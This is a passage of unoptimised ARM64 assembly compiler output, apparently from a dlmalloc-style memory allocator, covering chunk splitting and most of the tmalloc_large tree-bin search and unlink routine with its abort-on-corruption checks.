str x8, [x9, #8]
b LBB1_69
LBB1_60:
ldur x8, [x29, #-16]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldur x9, [x29, #-32]
str x8, [x9, #8]
ldur x8, [x29, #-40]
orr x8, x8, #0x1
ldur x9, [x29, #-80]
str x8, [x9, #8]
ldur x8, [x29, #-40]
ldur x9, [x29, #-80]
ldur x10, [x29, #-40]
str x8, [x9, x10]
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
str x8, [sp, #56]
ldr x8, [sp, #56]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB1_68
b LBB1_61
LBB1_61:
ldur x8, [x29, #-8]
ldr x8, [x8, #32]
str x8, [sp, #48]
ldr x8, [sp, #56]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #44]
ldur x8, [x29, #-8]
add x8, x8, #72
ldr w9, [sp, #44]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
str x8, [sp, #32]
ldr x8, [sp, #32]
str x8, [sp, #24]
ldur x8, [x29, #-8]
ldr w8, [x8]
ldr w10, [sp, #44]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB1_63
b LBB1_62
LBB1_62:
ldr w9, [sp, #44]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-8]
ldr w8, [x9]
orr w8, w8, w10
str w8, [x9]
b LBB1_67
LBB1_63:
ldr x8, [sp, #32]
ldr x8, [x8, #16]
ldur x9, [x29, #-8]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB1_65
b LBB1_64
LBB1_64:
ldr x8, [sp, #32]
ldr x8, [x8, #16]
str x8, [sp, #24]
b LBB1_66
LBB1_65:
bl _abort
LBB1_66:
b LBB1_67
LBB1_67:
ldr x8, [sp, #48]
ldr x9, [sp, #32]
str x8, [x9, #16]
ldr x8, [sp, #48]
ldr x9, [sp, #24]
str x8, [x9, #24]
ldr x8, [sp, #24]
ldr x9, [sp, #48]
str x8, [x9, #16]
ldr x8, [sp, #32]
ldr x9, [sp, #48]
str x8, [x9, #24]
b LBB1_68
LBB1_68:
ldur x8, [x29, #-40]
ldur x9, [x29, #-8]
str x8, [x9, #8]
ldur x8, [x29, #-80]
ldur x9, [x29, #-8]
str x8, [x9, #32]
b LBB1_69
LBB1_69:
ldur x8, [x29, #-32]
add x0, x8, #16
ldp x29, x30, [sp, #208] ; 16-byte Folded Reload
add sp, sp, #224
ret
LBB1_70:
b LBB1_71
LBB1_71:
bl _abort
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function tmalloc_large
_tmalloc_large: ; @tmalloc_large
.cfi_startproc
; %bb.0:
sub sp, sp, #416
.cfi_def_cfa_offset 416
stp x28, x27, [sp, #384] ; 16-byte Folded Spill
stp x29, x30, [sp, #400] ; 16-byte Folded Spill
add x29, sp, #400
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
stur x0, [x29, #-32]
stur x1, [x29, #-40]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-48]
ldur x9, [x29, #-40]
mov x8, #0
subs x8, x8, x9
stur x8, [x29, #-56]
ldur x8, [x29, #-40]
lsr x8, x8, #8
stur x8, [x29, #-80]
ldur x8, [x29, #-80]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB2_2
b LBB2_1
LBB2_1:
stur wzr, [x29, #-68]
b LBB2_6
LBB2_2:
ldur x8, [x29, #-80]
subs x8, x8, #16, lsl #12 ; =65536
cset w8, lo
tbnz w8, #0, LBB2_4
b LBB2_3
LBB2_3:
mov w8, #31
stur w8, [x29, #-68]
b LBB2_5
LBB2_4:
ldur x8, [x29, #-80]
; kill: def $w8 killed $w8 killed $x8
stur w8, [x29, #-84]
ldur w8, [x29, #-84]
subs w8, w8, #256
lsr w8, w8, #16
and w8, w8, #0x8
stur w8, [x29, #-88]
ldur w9, [x29, #-88]
ldur w8, [x29, #-84]
lsl w8, w8, w9
stur w8, [x29, #-84]
subs w8, w8, #1, lsl #12 ; =4096
lsr w8, w8, #16
and w8, w8, #0x4
stur w8, [x29, #-92]
ldur w9, [x29, #-92]
ldur w8, [x29, #-88]
add w8, w8, w9
stur w8, [x29, #-88]
ldur w9, [x29, #-92]
ldur w8, [x29, #-84]
lsl w8, w8, w9
stur w8, [x29, #-84]
subs w8, w8, #4, lsl #12 ; =16384
lsr w8, w8, #16
and w9, w8, #0x2
stur w9, [x29, #-92]
ldur w8, [x29, #-88]
add w8, w8, w9
stur w8, [x29, #-88]
ldur w9, [x29, #-88]
mov w8, #14
subs w8, w8, w9
ldur w10, [x29, #-92]
ldur w9, [x29, #-84]
lsl w9, w9, w10
stur w9, [x29, #-84]
add w8, w8, w9, lsr #15
stur w8, [x29, #-92]
ldur w8, [x29, #-92]
lsl w8, w8, #1
; kill: def $x8 killed $w8
ldur x9, [x29, #-40]
ldur w10, [x29, #-92]
add w10, w10, #7
; kill: def $x10 killed $w10
lsr x9, x9, x10
and x9, x9, #0x1
add x8, x8, x9
; kill: def $w8 killed $w8 killed $x8
stur w8, [x29, #-68]
b LBB2_5
LBB2_5:
b LBB2_6
LBB2_6:
ldur x8, [x29, #-32]
add x8, x8, #600
ldur w9, [x29, #-68]
; kill: def $x9 killed $w9
ldr x8, [x8, x9, lsl #3]
mov x9, x8
stur x9, [x29, #-64]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_22
b LBB2_7
LBB2_7:
ldur x8, [x29, #-40]
str x8, [sp, #56] ; 8-byte Folded Spill
ldur w8, [x29, #-68]
subs w8, w8, #31
cset w8, ne
tbnz w8, #0, LBB2_9
b LBB2_8
LBB2_8:
mov x8, #0
str x8, [sp, #48] ; 8-byte Folded Spill
b LBB2_10
LBB2_9:
ldur w8, [x29, #-68]
lsr w8, w8, #1
add w8, w8, #8
subs w8, w8, #2
mov x9, x8
mov x8, #63
subs x8, x8, x9
str x8, [sp, #48] ; 8-byte Folded Spill
b LBB2_10
LBB2_10:
ldr x8, [sp, #56] ; 8-byte Folded Reload
ldr x9, [sp, #48] ; 8-byte Folded Reload
lsl x8, x8, x9
stur x8, [x29, #-104]
; kill: def $x8 killed $xzr
stur xzr, [x29, #-112]
b LBB2_11
LBB2_11: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-40]
subs x8, x8, x9
stur x8, [x29, #-128]
ldur x8, [x29, #-128]
ldur x9, [x29, #-56]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB2_15
b LBB2_12
LBB2_12: ; in Loop: Header=BB2_11 Depth=1
ldur x8, [x29, #-64]
stur x8, [x29, #-48]
ldur x8, [x29, #-128]
stur x8, [x29, #-56]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB2_14
b LBB2_13
LBB2_13:
b LBB2_21
LBB2_14: ; in Loop: Header=BB2_11 Depth=1
b LBB2_15
LBB2_15: ; in Loop: Header=BB2_11 Depth=1
ldur x8, [x29, #-64]
ldr x8, [x8, #40]
stur x8, [x29, #-120]
ldur x8, [x29, #-64]
add x8, x8, #32
ldur x9, [x29, #-104]
lsr x9, x9, #63
and x9, x9, #0x1
ldr x8, [x8, x9, lsl #3]
stur x8, [x29, #-64]
ldur x8, [x29, #-120]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_18
b LBB2_16
LBB2_16: ; in Loop: Header=BB2_11 Depth=1
ldur x8, [x29, #-120]
ldur x9, [x29, #-64]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB2_18
b LBB2_17
LBB2_17: ; in Loop: Header=BB2_11 Depth=1
ldur x8, [x29, #-120]
stur x8, [x29, #-112]
b LBB2_18
LBB2_18: ; in Loop: Header=BB2_11 Depth=1
ldur x8, [x29, #-64]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB2_20
b LBB2_19
LBB2_19:
ldur x8, [x29, #-112]
stur x8, [x29, #-64]
b LBB2_21
LBB2_20: ; in Loop: Header=BB2_11 Depth=1
ldur x8, [x29, #-104]
lsl x8, x8, #1
stur x8, [x29, #-104]
b LBB2_11
LBB2_21:
b LBB2_22
LBB2_22:
ldur x8, [x29, #-64]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB2_27
b LBB2_23
LBB2_23:
ldur x8, [x29, #-48]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB2_27
b LBB2_24
LBB2_24:
ldur w9, [x29, #-68]
mov w8, #1
lsl w9, w8, w9
ldur w10, [x29, #-68]
lsl w10, w8, w10
mov w8, #0
subs w8, w8, w10, lsl #1
orr w8, w8, w9, lsl #1
ldur x9, [x29, #-32]
ldr w9, [x9, #4]
and w8, w8, w9
stur w8, [x29, #-132]
ldur w8, [x29, #-132]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB2_26
b LBB2_25
LBB2_25:
ldur w8, [x29, #-132]
ldur w10, [x29, #-132]
mov w9, #0
subs w9, w9, w10
and w8, w8, w9
stur w8, [x29, #-140]
ldur w8, [x29, #-140]
subs w8, w8, #1
stur w8, [x29, #-144]
ldur w8, [x29, #-144]
lsr w8, w8, #12
and w8, w8, #0x10
stur w8, [x29, #-148]
ldur w8, [x29, #-148]
stur w8, [x29, #-152]
ldur w9, [x29, #-148]
ldur w8, [x29, #-144]
lsr w8, w8, w9
stur w8, [x29, #-144]
ldur w8, [x29, #-144]
lsr w8, w8, #5
and w9, w8, #0x8
stur w9, [x29, #-148]
ldur w8, [x29, #-152]
add w8, w8, w9
stur w8, [x29, #-152]
ldur w9, [x29, #-148]
ldur w8, [x29, #-144]
lsr w8, w8, w9
stur w8, [x29, #-144]
ldur w8, [x29, #-144]
lsr w8, w8, #2
and w9, w8, #0x4
stur w9, [x29, #-148]
ldur w8, [x29, #-152]
add w8, w8, w9
stur w8, [x29, #-152]
ldur w9, [x29, #-148]
ldur w8, [x29, #-144]
lsr w8, w8, w9
stur w8, [x29, #-144]
ldur w8, [x29, #-144]
lsr w8, w8, #1
and w9, w8, #0x2
stur w9, [x29, #-148]
ldur w8, [x29, #-152]
add w8, w8, w9
stur w8, [x29, #-152]
ldur w9, [x29, #-148]
ldur w8, [x29, #-144]
lsr w8, w8, w9
stur w8, [x29, #-144]
ldur w8, [x29, #-144]
lsr w8, w8, #1
and w9, w8, #0x1
stur w9, [x29, #-148]
ldur w8, [x29, #-152]
add w8, w8, w9
stur w8, [x29, #-152]
ldur w9, [x29, #-148]
ldur w8, [x29, #-144]
lsr w8, w8, w9
stur w8, [x29, #-144]
ldur w8, [x29, #-152]
ldur w9, [x29, #-144]
add w8, w8, w9
stur w8, [x29, #-136]
ldur x8, [x29, #-32]
add x8, x8, #600
ldur w9, [x29, #-136]
; kill: def $x9 killed $w9
ldr x8, [x8, x9, lsl #3]
stur x8, [x29, #-64]
b LBB2_26
LBB2_26:
b LBB2_27
LBB2_27:
b LBB2_28
LBB2_28: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-64]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_35
b LBB2_29
LBB2_29: ; in Loop: Header=BB2_28 Depth=1
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-40]
subs x8, x8, x9
stur x8, [x29, #-160]
ldur x8, [x29, #-160]
ldur x9, [x29, #-56]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB2_31
b LBB2_30
LBB2_30: ; in Loop: Header=BB2_28 Depth=1
ldur x8, [x29, #-160]
stur x8, [x29, #-56]
ldur x8, [x29, #-64]
stur x8, [x29, #-48]
b LBB2_31
LBB2_31: ; in Loop: Header=BB2_28 Depth=1
ldur x8, [x29, #-64]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_33
b LBB2_32
LBB2_32: ; in Loop: Header=BB2_28 Depth=1
ldur x8, [x29, #-64]
ldr x8, [x8, #32]
str x8, [sp, #40] ; 8-byte Folded Spill
b LBB2_34
LBB2_33: ; in Loop: Header=BB2_28 Depth=1
ldur x8, [x29, #-64]
ldr x8, [x8, #40]
str x8, [sp, #40] ; 8-byte Folded Spill
b LBB2_34
LBB2_34: ; in Loop: Header=BB2_28 Depth=1
ldr x8, [sp, #40] ; 8-byte Folded Reload
stur x8, [x29, #-64]
b LBB2_28
LBB2_35:
ldur x8, [x29, #-48]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_128
b LBB2_36
LBB2_36:
ldur x8, [x29, #-56]
ldur x9, [x29, #-32]
ldr x9, [x9, #8]
ldur x10, [x29, #-40]
subs x9, x9, x10
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB2_128
b LBB2_37
LBB2_37:
ldur x8, [x29, #-48]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_127
b LBB2_38
LBB2_38:
ldur x8, [x29, #-48]
ldur x9, [x29, #-40]
add x8, x8, x9
stur x8, [x29, #-168]
ldur x8, [x29, #-48]
ldur x9, [x29, #-168]
subs x8, x8, x9
cset w9, lo
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_126
b LBB2_39
LBB2_39:
ldur x8, [x29, #-48]
ldr x8, [x8, #48]
stur x8, [x29, #-176]
ldur x8, [x29, #-48]
ldr x8, [x8, #24]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB2_47
b LBB2_40
LBB2_40:
ldur x8, [x29, #-48]
ldr x8, [x8, #16]
stur x8, [x29, #-192]
ldur x8, [x29, #-48]
ldr x8, [x8, #24]
stur x8, [x29, #-184]
ldur x8, [x29, #-192]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB2_43
b LBB2_41
LBB2_41:
ldur x8, [x29, #-192]
ldr x8, [x8, #24]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, ne
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB2_43
b LBB2_42
LBB2_42:
ldur x8, [x29, #-184]
ldr x8, [x8, #16]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB2_43
LBB2_43:
ldr w8, [sp, #36] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_45
b LBB2_44
LBB2_44:
ldur x8, [x29, #-184]
ldur x9, [x29, #-192]
str x8, [x9, #24]
ldur x8, [x29, #-192]
ldur x9, [x29, #-184]
str x8, [x9, #16]
b LBB2_46
LBB2_45:
bl _abort
LBB2_46:
b LBB2_59
LBB2_47:
ldur x8, [x29, #-48]
add x9, x8, #40
str x9, [sp, #200]
ldr x8, [x8, #40]
mov x9, x8
stur x9, [x29, #-184]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB2_49
b LBB2_48
LBB2_48:
ldur x8, [x29, #-48]
add x9, x8, #32
str x9, [sp, #200]
ldr x8, [x8, #32]
mov x9, x8
stur x9, [x29, #-184]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_58
b LBB2_49
LBB2_49:
b LBB2_50
LBB2_50: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-184]
add x9, x8, #40
str x9, [sp, #192]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB2_52
b LBB2_51
LBB2_51: ; in Loop: Header=BB2_50 Depth=1
ldur x8, [x29, #-184]
add x9, x8, #32
str x9, [sp, #192]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB2_52
LBB2_52: ; in Loop: Header=BB2_50 Depth=1
ldr w8, [sp, #32] ; 4-byte Folded Reload
tbz w8, #0, LBB2_54
b LBB2_53
LBB2_53: ; in Loop: Header=BB2_50 Depth=1
ldr x8, [sp, #192]
mov x9, x8
str x9, [sp, #200]
ldr x8, [x8]
stur x8, [x29, #-184]
b LBB2_50
LBB2_54:
ldr x8, [sp, #200]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_56
b LBB2_55
LBB2_55:
ldr x8, [sp, #200]
; kill: def $x9 killed $xzr
str xzr, [x8]
b LBB2_57
LBB2_56:
bl _abort
LBB2_57:
b LBB2_58
LBB2_58:
b LBB2_59
LBB2_59:
ldur x8, [x29, #-176]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_87
b LBB2_60
LBB2_60:
ldur x8, [x29, #-32]
add x8, x8, #600
ldur x9, [x29, #-48]
ldr w9, [x9, #56]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #184]
ldur x8, [x29, #-48]
ldr x9, [sp, #184]
ldr x9, [x9]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB2_64
b LBB2_61
LBB2_61:
ldur x8, [x29, #-184]
ldr x10, [sp, #184]
mov x9, x8
str x9, [x10]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB2_63
b LBB2_62
LBB2_62:
ldur x8, [x29, #-48]
ldr w9, [x8, #56]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-32]
ldr w8, [x9, #4]
bic w8, w8, w10
str w8, [x9, #4]
b LBB2_63
LBB2_63:
b LBB2_71
LBB2_64:
ldur x8, [x29, #-176]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_69
b LBB2_65
LBB2_65:
ldur x8, [x29, #-176]
ldr x8, [x8, #32]
ldur x9, [x29, #-48]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB2_67
b LBB2_66
LBB2_66:
ldur x8, [x29, #-184]
ldur x9, [x29, #-176]
str x8, [x9, #32]
b LBB2_68
LBB2_67:
ldur x8, [x29, #-184]
ldur x9, [x29, #-176]
str x8, [x9, #40]
b LBB2_68
LBB2_68:
b LBB2_70
LBB2_69:
bl _abort
LBB2_70:
b LBB2_71
LBB2_71:
ldur x8, [x29, #-184]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_86
b LBB2_72
LBB2_72:
ldur x8, [x29, #-184]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_84
b LBB2_73
LBB2_73:
ldur x8, [x29, #-176]
ldur x9, [x29, #-184]
str x8, [x9, #48]
ldur x8, [x29, #-48]
ldr x8, [x8, #32]
mov x9, x8
str x9, [sp, #176]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_78
b LBB2_74
LBB2_74:
ldr x8, [sp, #176]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_76
b LBB2_75
LBB2_75:
ldr x8, [sp, #176]
ldur x9, [x29, #-184]
str x8, [x9, #32]
ldur x8, [x29, #-184]
ldr x9, [sp, #176]
str x8, [x9, #48]
b LBB2_77
LBB2_76:
bl _abort
LBB2_77:
b LBB2_78
LBB2_78:
ldur x8, [x29, #-48]
ldr x8, [x8, #40]
mov x9, x8
str x9, [sp, #168]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_83
b LBB2_79
LBB2_79:
ldr x8, [sp, #168]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_81
b LBB2_80
LBB2_80:
ldr x8, [sp, #168]
ldur x9, [x29, #-184]
str x8, [x9, #40]
ldur x8, [x29, #-184]
ldr x9, [sp, #168]
str x8, [x9, #48]
b LBB2_82
LBB2_81:
bl _abort
LBB2_82:
b LBB2_83
LBB2_83:
b LBB2_85
LBB2_84:
bl _abort
LBB2_85:
b LBB2_86
LBB2_86:
b LBB2_87
LBB2_87:
ldur x8, [x29, #-56]
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB2_89
b LBB2_88
LBB2_88:
ldur x8, [x29, #-56]
ldur x9, [x29, #-40]
add x8, x8, x9
orr x8, x8, #0x1
orr x8, x8, #0x2
ldur x9, [x29, #-48]
str x8, [x9, #8]
ldur x8, [x29, #-48]
ldur x9, [x29, #-56]
ldur x10, [x29, #-40]
add x9, x9, x10
add x9, x8, x9
ldr x8, [x9, #8]
orr x8, x8, #0x1
str x8, [x9, #8]
b LBB2_125
LBB2_89:
ldur x8, [x29, #-40]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldur x9, [x29, #-48]
str x8, [x9, #8]
ldur x8, [x29, #-56]
orr x8, x8, #0x1
ldur x9, [x29, #-168]
str x8, [x9, #8]
ldur x8, [x29, #-56]
ldur x9, [x29, #-168]
ldur x10, [x29, #-56]
str x8, [x9, x10]
ldur x8, [x29, #-56]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB2_97
b LBB2_90
LBB2_90:
ldur x8, [x29, #-56]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #164]
ldur x8, [x29, #-32]
add x8, x8, #72
ldr w9, [sp, #164]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
str x8, [sp, #152]
ldr x8, [sp, #152]
str x8, [sp, #144]
ldur x8, [x29, #-32]
ldr w8, [x8]
ldr w10, [sp, #164]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_92
b LBB2_91
LBB2_91:
ldr w9, [sp, #164]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-32]
ldr w8, [x9]
orr w8, w8, w10
str w8, [x9]
b LBB2_96
LBB2_92:
ldr x8, [sp, #152]
ldr x8, [x8, #16]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_94
b LBB2_93
LBB2_93:
ldr x8, [sp, #152]
ldr x8, [x8, #16]
str x8, [sp, #144]
b LBB2_95
LBB2_94:
bl _abort
LBB2_95:
b LBB2_96
LBB2_96:
ldur x8, [x29, #-168]
ldr x9, [sp, #152]
str x8, [x9, #16]
ldur x8, [x29, #-168]
ldr x9, [sp, #144]
str x8, [x9, #24]
ldr x8, [sp, #144]
ldur x9, [x29, #-168]
str x8, [x9, #16]
ldr x8, [sp, #152]
ldur x9, [x29, #-168]
str x8, [x9, #24]
b LBB2_124
LBB2_97:
ldur x8, [x29, #-168]
str x8, [sp, #136]
ldur x8, [x29, #-56]
lsr x8, x8, #8
str x8, [sp, #112]
ldr x8, [sp, #112]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB2_99
b LBB2_98
LBB2_98:
str wzr, [sp, #124]
b LBB2_103
LBB2_99:
ldr x8, [sp, #112]
subs x8, x8, #16, lsl #12 ; =65536
cset w8, lo
tbnz w8, #0, LBB2_101
b LBB2_100
LBB2_100:
mov w8, #31
str w8, [sp, #124]
b LBB2_102
LBB2_101:
ldr x8, [sp, #112]
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #108]
ldr w8, [sp, #108]
subs w8, w8, #256
lsr w8, w8, #16
and w8, w8, #0x8
str w8, [sp, #104]
ldr w9, [sp, #104]
ldr w8, [sp, #108]
lsl w8, w8, w9
str w8, [sp, #108]
subs w8, w8, #1, lsl #12 ; =4096
lsr w8, w8, #16
and w8, w8, #0x4
str w8, [sp, #100]
ldr w9, [sp, #100]
ldr w8, [sp, #104]
add w8, w8, w9
str w8, [sp, #104]
ldr w9, [sp, #100]
ldr w8, [sp, #108]
lsl w8, w8, w9
str w8, [sp, #108]
subs w8, w8, #4, lsl #12 ; =16384
lsr w8, w8, #16
and w9, w8, #0x2
str w9, [sp, #100]
ldr w8, [sp, #104]
add w8, w8, w9
str w8, [sp, #104]
ldr w9, [sp, #104]
mov w8, #14
subs w8, w8, w9
ldr w10, [sp, #100]
ldr w9, [sp, #108]
lsl w9, w9, w10
str w9, [sp, #108]
add w8, w8, w9, lsr #15
str w8, [sp, #100]
ldr w8, [sp, #100]
lsl w8, w8, #1
; kill: def $x8 killed $w8
ldur x9, [x29, #-56]
ldr w10, [sp, #100]
add w10, w10, #7
; kill: def $x10 killed $w10
lsr x9, x9, x10
and x9, x9, #0x1
add x8, x8, x9
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #124]
b LBB2_102
LBB2_102:
b LBB2_103
LBB2_103:
ldur x8, [x29, #-32]
add x8, x8, #600
ldr w9, [sp, #124]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #128]
ldr w8, [sp, #124]
ldr x9, [sp, #136]
str w8, [x9, #56]
ldr x8, [sp, #136]
; kill: def $x9 killed $xzr
str xzr, [x8, #40]
ldr x8, [sp, #136]
str xzr, [x8, #32]
ldur x8, [x29, #-32]
ldr w8, [x8, #4]
ldr w10, [sp, #124]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB2_105
b LBB2_104
LBB2_104:
ldr w9, [sp, #124]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-32]
ldr w8, [x9, #4]
orr w8, w8, w10
str w8, [x9, #4]
ldr x8, [sp, #136]
ldr x9, [sp, #128]
str x8, [x9]
ldr x8, [sp, #128]
ldr x9, [sp, #136]
str x8, [x9, #48]
ldr x8, [sp, #136]
ldr x9, [sp, #136]
str x8, [x9, #24]
ldr x9, [sp, #136]
str x8, [x9, #16]
b LBB2_123
LBB2_105:
ldr x8, [sp, #128]
ldr x8, [x8]
str x8, [sp, #88]
ldur x8, [x29, #-56]
str x8, [sp, #24] ; 8-byte Folded Spill
ldr w8, [sp, #124]
subs w8, w8, #31
cset w8, ne
tbnz w8, #0, LBB2_107
b LBB2_106
LBB2_106:
mov x8, #0
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB2_108
LBB2_107:
ldr w8, [sp, #124]
lsr w8, w8, #1
add w8, w8, #8
subs w8, w8, #2
mov x9, x8
mov x8, #63
subs x8, x8, x9
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB2_108
LBB2_108:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x9, [sp, #16] ; 8-byte Folded Reload
lsl x8, x8, x9
str x8, [sp, #80]
b LBB2_109
LBB2_109: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #88]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-56]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB2_116
b LBB2_110
LBB2_110: ; in Loop: Header=BB2_109 Depth=1
ldr x8, [sp, #88]
add x8, x8, #32
ldr x9, [sp, #80]
lsr x9, x9, #63
and x9, x9, #0x1
add x8, x8, x9, lsl #3
str x8, [sp, #72]
ldr x8, [sp, #80]
lsl x8, x8, #1
str x8, [sp, #80]
ldr x8, [sp, #72]
ldr x8, [x8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB2_112
b LBB2_111
LBB2_111: ; in Loop: Header=BB2_109 Depth=1
ldr x8, [sp, #72]
ldr x8, [x8]
str x8, [sp, #88]
b LBB2_115
LBB2_112:
ldr x8, [sp, #72]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_114
b LBB2_113
LBB2_113:
ldr x8, [sp, #136]
ldr x9, [sp, #72]
str x8, [x9]
ldr x8, [sp, #88]
ldr x9, [sp, #136]
str x8, [x9, #48]
ldr x8, [sp, #136]
ldr x9, [sp, #136]
str x8, [x9, #24]
ldr x9, [sp, #136]
str x8, [x9, #16]
b LBB2_122
LBB2_114:
bl _abort
LBB2_115: ; in Loop: Header=BB2_109 Depth=1
b LBB2_121
LBB2_116:
ldr x8, [sp, #88]
ldr x8, [x8, #16]
str x8, [sp, #64]
ldr x8, [sp, #88]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB2_118
b LBB2_117
LBB2_117:
ldr x8, [sp, #64]
ldur x9, [x29, #-32]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB2_118
LBB2_118:
ldr w8, [sp, #12] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB2_120
b LBB2_119
LBB2_119:
